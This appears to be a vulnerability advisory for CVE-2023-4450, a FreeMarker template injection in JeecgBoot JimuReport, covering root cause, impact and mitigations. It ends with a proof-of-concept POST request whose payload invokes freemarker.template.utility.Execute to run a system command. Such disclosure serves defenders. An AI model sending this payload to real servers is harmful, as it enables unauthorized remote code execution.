JeecgBoot JimuReport FreeMarker SSTI RCE – CVE-2023-4450

Vendor Discription:-

JeecgBoot is a Spring Boot–based low-code platform designed for rapid development of enterprise applications. JimuReport is its built-in reporting tool that allows users to design, generate, and export dynamic reports. It leverages FreeMarker, a Java-based template engine, to render report content dynamically. Together, they enable flexible and customizable report generation within JeecgBoot applications.

CVE-2023-4450 Description:-

CVE-2023-4450 is a critical remote code execution vulnerability affecting JeecgBoot JimuReport up to version 1.6.0. It arises due to the way the product processes user-supplied template data using the FreeMarker template engine. Specifically, the vulnerability exists because the vulnerable endpoint /jeecg-boot/jmreport/queryFieldBySql accepts user input in the form of SQL queries embedded within FreeMarker templates, which are parsed and executed without proper input validation or sanitization. This lack of input filtering allows attackers to inject malicious FreeMarker expressions that the server executes as code. These expressions can invoke powerful FreeMarker classes like freemarker.template.utility.Execute to run arbitrary system commands on the affected server. The issue is especially severe if the API endpoint is publicly accessible without authentication, enabling remote, unauthenticated attackers to exploit this flaw simply by sending crafted requests. In essence, the root cause lies in blindly trusting user input, enabling unrestricted template execution, and failing to sandbox or limit the capabilities of the FreeMarker engine. This combination leads to server-side template injection and consequent remote code execution.

Impact of CVE-2023-4450

• Remote Code Execution: Attackers can remotely execute arbitrary system commands on vulnerable JimuReport servers, potentially taking full control of the affected systems.
• Data Breach Risk: Sensitive business data stored or processed by the JimuReport instance may be accessed, modified, or exfiltrated by attackers.
• Service Disruption: Exploitation can lead to service outages, defacement, or denial of service if attackers disrupt, delete, or alter system files and processes.
• Privilege Escalation: Malicious actors might leverage this flaw to move laterally, gain higher privileges, or compromise other systems within the same network environment.
• Widespread Attacks: If the vulnerable endpoint is exposed without authentication on the internet, it enables unauthenticated attackers to launch automated mass-exploitation campaigns across multiple organizations.

Mitigation:

• Upgrade Software: Update JimuReport to version 1.6.1 or later, where the vulnerability is patched, to prevent exploitation.
• Restrict Endpoint Access: Limit public exposure of vulnerable endpoints using network segmentation, firewalls, or VPNs so only trusted users can access the APIs.
• Input Validation: Implement strict validation and sanitization of all user-supplied data processed by the FreeMarker template engine to block injection attacks.
• Disable Dangerous Template Methods: Configure FreeMarker and related components to restrict or disable the execution of potentially dangerous utility classes such as freemarker.template.utility.Execute.
• Monitor and Audit: Continuously monitor server logs and network traffic for signs of suspicious activity or exploitation attempts, and conduct regular security assessments to identify unpatched or misconfigured systems.

POC

Send the following request to execute the FreeMarker template <#assign ex="freemarker.template.utility.Execute"?new()> ${ex("id")}:

POST /jmreport/queryFieldBySql HTTP/1.1
Host: localhost:8085
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.122 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/json
Content-Length: 100

{"sql":"select 'result:<#assign ex=\"freemarker.template.utility.Execute\"?new()> ${ex(\"id\")}'" }